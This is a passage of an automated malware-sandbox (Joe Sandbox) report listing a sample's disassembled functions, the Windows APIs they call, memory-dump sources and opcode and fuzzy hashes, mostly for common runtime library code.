                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                    • String ID: CMT
                                                                                    • API String ID: 3741668355-2756464174
                                                                                    • Opcode ID: 9bc7cbdb0716b321c9d2b0705a5c4ae67bc149aafa6d364f490be8552b776f9c
                                                                                    • Instruction ID: 24243b9c1b6641be6af95affe796b25aa74960cc751e777069993f23feaf8f2d
                                                                                    • Opcode Fuzzy Hash: 9bc7cbdb0716b321c9d2b0705a5c4ae67bc149aafa6d364f490be8552b776f9c
                                                                                    • Instruction Fuzzy Hash: A062D172A00684CFDB19DF74C8856EA3BE1AF65305F05457EECAA8F282D770994DCB60
                                                                                    Function 00175B53 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00175C4B
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00175C55
                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00175C62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: a89824826242e2ceeef9a158b0952e65cd633b0397950ddfa06271b491a8e6f0
                                                                                    • Instruction ID: cca379808d3b9a4261fd9799e631c04c669bae351ee2deb17243bf3baae0b1aa
                                                                                    • Opcode Fuzzy Hash: a89824826242e2ceeef9a158b0952e65cd633b0397950ddfa06271b491a8e6f0
                                                                                    • Instruction Fuzzy Hash: 9431D374D0122C9BCB21DF64DC8979CBBB8BF18310F5045EAE80CA7250E7709B958F45
                                                                                    Function 00179EB0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                    • Instruction ID: e5077ae19e5becc45d0a26510c8a7136da5feeac03b30c77bc890465c0d52dc6
                                                                                    • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                    • Instruction Fuzzy Hash: 3B021D71E002199FDF14CFA9C8906AEBBF1FF88314F65816AE919E7341D731AA418B91
                                                                                    Function 0016932F Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00169355
                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0018A154,?,?), ref: 001693A4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                    • String ID:
                                                                                    • API String ID: 2169056816-0
                                                                                    • Opcode ID: 8e8fe86e0e535d4ae16c5d7acd9a60364da9d043eec3479d9f9b8b325074c957
                                                                                    • Instruction ID: 683802e1adea42e41d718dd66c848e5273480d7b1c49b4a05edfe7731f9121d7
                                                                                    • Opcode Fuzzy Hash: 8e8fe86e0e535d4ae16c5d7acd9a60364da9d043eec3479d9f9b8b325074c957
                                                                                    • Instruction Fuzzy Hash: C0015E35500349ABDB109FB4DD49FAB77BCEF49720F404422BA04E75A0D3709A69CBA6
                                                                                    Function 0017E8D4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0017E8CF,?,?,00000008,?,?,0017E56F,00000000), ref: 0017EB01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: fbb3c60f401b870738fdf4985abebc05e6a1c4ffdd9cd282907c7442900aaa93
                                                                                    • Instruction ID: 82fee0d3a2d590caff15319a20fa94721fa722c5d51815e182bc9cc262ad627c
                                                                                    • Opcode Fuzzy Hash: fbb3c60f401b870738fdf4985abebc05e6a1c4ffdd9cd282907c7442900aaa93
                                                                                    • Instruction Fuzzy Hash: 21B11A325106089FD719CF28C48AB657BF1FF49365F29C698E99ACF2A1C335E991CB40
                                                                                    Function 00153FC5 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: gj
                                                                                    • API String ID: 0-4203073231
                                                                                    • Opcode ID: 7944bd1afc12b196b267d1e28d12030be25fc936580356e528cb480079b7fe16
                                                                                    • Instruction ID: 969d1b3bc7a760a630f1fb07846aa511286e75e0239096149ea957c6a0efbf5d
                                                                                    • Opcode Fuzzy Hash: 7944bd1afc12b196b267d1e28d12030be25fc936580356e528cb480079b7fe16
                                                                                    • Instruction Fuzzy Hash: 0FF1C3B1A083418FD788CF29D890A1AFBE1BFCC208F15892EF998D7711D734E9558B56
                                                                                    Function 0015A8E0 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 0015A905
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID:
                                                                                    • API String ID: 1889659487-0
                                                                                    • Opcode ID: 682b5a792ffc52a274638ad338fa450294bf0dd4e3d27c3f048d2cede8e3f1b4
                                                                                    • Instruction ID: a1a746f186609958197e2122b59701a15e844ca7026bf241e457fb98bbbb6711
                                                                                    • Opcode Fuzzy Hash: 682b5a792ffc52a274638ad338fa450294bf0dd4e3d27c3f048d2cede8e3f1b4
                                                                                    • Instruction Fuzzy Hash: 6DF090B4900719CBCB28CF18EC82AE473B5FB49315F610395E92557B90D3719EC48FA2
                                                                                    Function 0016DBC3 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,0016D604), ref: 0016DBC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: be99e57d45731fa9e1213674c269eba2c8649c7bb51024205421cd50f8c8fc88
                                                                                    • Instruction ID: f91d7ae702a9429fb2da540f4db3af6f6d3f4421676242220809dbc0ba1d3ff0
                                                                                    • Opcode Fuzzy Hash: be99e57d45731fa9e1213674c269eba2c8649c7bb51024205421cd50f8c8fc88
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 00178AAA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: c65b3c1c80fe2f8bdbc5ae2ad7b0097a9ac7da646c5feeba36913288095c762c
                                                                                    • Instruction ID: 93784157fc97081a81af3bd1546accd2f95f724899b95386b8cdedf1df7055fa
                                                                                    • Opcode Fuzzy Hash: c65b3c1c80fe2f8bdbc5ae2ad7b0097a9ac7da646c5feeba36913288095c762c
                                                                                    • Instruction Fuzzy Hash: F2A02230202200EFAB808F32AF0E30C3AE8BF0B3E0300802CA008C2A30EB30C3C08B00
                                                                                    Function 00164FB5 Relevance: .8, Instructions: 800COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                    • Instruction ID: 9cbd1384dfc64a112ec3514ebb3a72c541076d078f3cdb4be39fcef043a08f90
                                                                                    • Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                    • Instruction Fuzzy Hash: F862E771604B859FCB29CF38CC906B9BBE2AF55304F09856ED8AB8B346D734E955CB10
                                                                                    Function 001663F2 Relevance: .8, Instructions: 773COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                    • Instruction ID: 4feaeb1a917ce446e7c4f702e572eb9f59f0634aaffa00ef5a0778e4335ccd3b
                                                                                    • Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                    • Instruction Fuzzy Hash: 9A62F07160478A9FC719CF28CD905B9FBE0BF55308F14866ED9A68B742D730E969CB80
                                                                                    Function 0015E045 Relevance: .7, Instructions: 694COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                    • Instruction ID: 6f5ccd7d6c568568ed07d446eebad1d009bd5e8d0e67ccb8e4396368e0c5053d
                                                                                    • Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                    • Instruction Fuzzy Hash: 725249B2A047019FC758CF18C891A6AF7E1FFC8304F49892DF9969B255D334E959CB82
                                                                                    Function 00165DB9 Relevance: .5, Instructions: 509COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee1b906e5cdbe790ef068419de70b2a1437e40131cff61504542b3b6f42b1f0e
                                                                                    • Instruction ID: 89368d8a9407ebaffad802c4323ab06ba74016504ea5222155d5f6e9bc9e528e
                                                                                    • Opcode Fuzzy Hash: ee1b906e5cdbe790ef068419de70b2a1437e40131cff61504542b3b6f42b1f0e
                                                                                    • Instruction Fuzzy Hash: 6C12B4B1604B068BC72CDF28C9D06B9B3E1FF55308F14892EE997C7A81D774A8A5CB45
                                                                                    Function 0015BA1A Relevance: .4, Instructions: 449COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ee64b9abfd6caaba819cdf5edc5f198d7bc4703004da04fd372bb33bc9a22f3
                                                                                    • Instruction ID: 69685257220c554e2bdf6bd4d2115a5e961f2c6e8f430bab96da33fdbb22667c
                                                                                    • Opcode Fuzzy Hash: 5ee64b9abfd6caaba819cdf5edc5f198d7bc4703004da04fd372bb33bc9a22f3
                                                                                    • Instruction Fuzzy Hash: 2BF17871A08345CFC718CF29C4C456ABBE2FF98715F144A2EF8A58B355D730EA098B46
                                                                                    Function 0016F693 Relevance: .3, Instructions: 345COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                    • Instruction ID: 4d13e3a2f9510f79626eeafab905862dec60ad56b08dfbe4bf87100a0b13b25a
                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                    • Instruction Fuzzy Hash: 36C18F362051930ADB2D4679A97413EBEA15EA27B131A07BDE4B7CB1D4FF20C536DA20
                                                                                    Function 0016FAC8 Relevance: .3, Instructions: 341COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                    • Instruction ID: 1cf106da0708a0ea788cad1d98899049061c9ef36d465d6a2b2e07c80c0cbb20
                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                    • Instruction Fuzzy Hash: AAC1A1362091930ADF2D4679E97403EBEA15AA27B131A077DD8B7CB1D5FF20C536DA20
                                                                                    Function 0016F25E Relevance: .3, Instructions: 331COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                    • Instruction ID: 1179c32682f1310eb4126d54d8a90a71728b5cf9a7835c1a105227372c2c70a2
                                                                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                    • Instruction Fuzzy Hash: 87C172362051930ADF2D4679E97403EBEA15AA27B131A077DD8B7CB1D4FF10C576DA20
                                                                                    Function 0016EE46 Relevance: .3, Instructions: 323COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction ID: 0fc91d535d241861bf25b2721f7903e1033239d97a6ef995322ab3efca5907f6
                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction Fuzzy Hash: 66C180362050934ADF2D4639D97803EBEA15AA27B131A17BDE4B7CB1C5FF20C535DA20
                                                                                    Function 0015D5E4 Relevance: .3, Instructions: 318COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 84534681927d0d551d83530a4cc010f1e42e28eaf2bc7283e8d38c08a7954a89
                                                                                    • Instruction ID: 41cc83b296b2f213ebed252ec6e7689d8c23db851fe7509871f6dda9340b534d
